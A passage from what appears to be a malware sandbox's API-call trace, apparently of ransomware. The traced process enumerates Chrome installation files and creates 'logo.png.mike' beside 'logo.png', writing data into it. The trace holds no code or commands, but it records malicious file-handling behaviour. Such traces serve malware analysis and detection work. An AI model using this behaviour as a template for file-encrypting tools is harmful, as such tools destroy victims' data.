lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff10fda0, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4f596, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT.pak", cAlternateFileName="")) returned 1 [0114.303] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff13208e, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x51b03, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro.pak", cAlternateFileName="")) returned 1 [0114.303] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff162de2, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x7e47b, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru.pak", cAlternateFileName="")) returned 1 [0114.303] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff18ed14, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x5402d, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk.pak", cAlternateFileName="")) returned 1 [0114.303] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff1b1002, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4bb7e, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl.pak", cAlternateFileName="")) returned 1 [0114.303] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff1d8112, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x79e3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr.pak", cAlternateFileName="")) returned 1 [0114.303] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff206755, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x496bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv.pak", cAlternateFileName="")) returned 1 [0114.303] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff22d865, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x44b74, dwReserved0=0x0, dwReserved1=0x0, cFileName="sw.pak", cAlternateFileName="")) returned 1 [0114.304] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff25bea8, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xbcd4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ta.pak", cAlternateFileName="")) returned 1 [0114.304] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff298f51, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xb0b7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="te.pak", cAlternateFileName="")) returned 1 [0114.304] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff2c4e83, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x9efb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="th.pak", cAlternateFileName="")) returned 1 [0114.304] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff2f0db5, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4f508, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr.pak", cAlternateFileName="")) returned 1 [0114.304] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff31cce7, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x7e1bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk.pak", cAlternateFileName="")) returned 1 [0114.304] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff343df7, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x5af42, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi.pak", cAlternateFileName="")) returned 1 [0114.304] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff3687f6, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4217c, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN.pak", cAlternateFileName="")) returned 1 [0114.305] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff394728, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x42194, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW.pak", cAlternateFileName="")) returned 1 [0114.305] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff394728, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x42194, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW.pak", cAlternateFileName="")) returned 0 [0114.305] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0114.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0114.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0114.306] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements", lpFilePart=0x0) returned 0x4d [0114.306] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.306] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.306] CoTaskMemFree (pv=0x508980) [0114.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.306] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements", lpFilePart=0x0) returned 0x4d [0114.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0114.306] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements", lpFilePart=0x0) returned 0x4d [0114.306] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", lpFilePart=0x0) returned 0x4e [0114.306] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d9a09c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0114.308] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d9a09c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.308] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9a09c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff3a589f, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x442a, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0114.308] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9a09c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff3a7fb0, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x5741, dwReserved0=0x0, dwReserved1=0x0, cFileName="logocanary.png", cAlternateFileName="LOGOCA~1.PNG")) returned 1 [0114.308] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9a09c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff3b6a16, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x1ef3, dwReserved0=0x0, dwReserved1=0x0, cFileName="smalllogo.png", cAlternateFileName="SMALLL~1.PNG")) returned 1 [0114.308] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9a09c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff3c547c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x1ea2, dwReserved0=0x0, dwReserved1=0x0, cFileName="smalllogocanary.png", cAlternateFileName="SMALLL~2.PNG")) returned 1 [0114.309] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0114.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0114.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0114.309] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", lpFilePart=0x0) returned 0x56 [0114.310] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", lpFilePart=0x0) returned 0x56 [0114.310] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", lpFilePart=0x0) returned 0x56 [0114.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0114.310] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0114.311] GetFileType (hFile=0x288) returned 0x1 [0114.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0114.311] GetFileType (hFile=0x288) returned 0x1 [0114.311] CloseHandle (hObject=0x288) returned 1 [0114.311] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", lpFilePart=0x0) returned 0x56 [0114.312] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", lpFilePart=0x0) returned 0x56 [0114.312] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0114.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0114.312] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0114.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0114.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0114.312] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png"), fInfoLevelId=0x0, lpFileInformation=0x224046c | out: lpFileInformation=0x224046c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9a09c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff3a589f, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x442a)) returned 1 [0114.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0114.312] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", lpFilePart=0x0) returned 0x56 [0114.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0114.312] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png"), fInfoLevelId=0x0, lpFileInformation=0x22407c0 | out: lpFileInformation=0x22407c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9a09c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff3a589f, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x442a)) returned 1 [0114.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0114.312] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", lpFilePart=0x0) returned 0x56 [0114.312] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", lpFilePart=0x0) returned 0x5b [0114.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0114.312] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0114.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0114.313] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", lpFilePart=0x0) returned 0x56 [0114.313] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", lpFilePart=0x0) returned 0x56 [0114.313] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png", lpFilePart=0x0) returned 0x56 [0114.313] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", lpFilePart=0x0) returned 0x5b [0114.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0114.313] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0114.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0114.313] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike", lpFilePart=0x0) returned 0x5b [0114.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0114.313] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0114.314] GetFileType (hFile=0x288) returned 0x1 [0114.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0114.314] GetFileType (hFile=0x288) returned 0x1 [0114.314] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0114.314] WriteFile (in: hFile=0x288, lpBuffer=0x22417bc*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22417bc*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0114.315] CloseHandle (hObject=0x288) returned 1 [0114.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0114.315] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png"), fInfoLevelId=0x0, lpFileInformation=0x2241274 | out: lpFileInformation=0x2241274*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9a09c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, 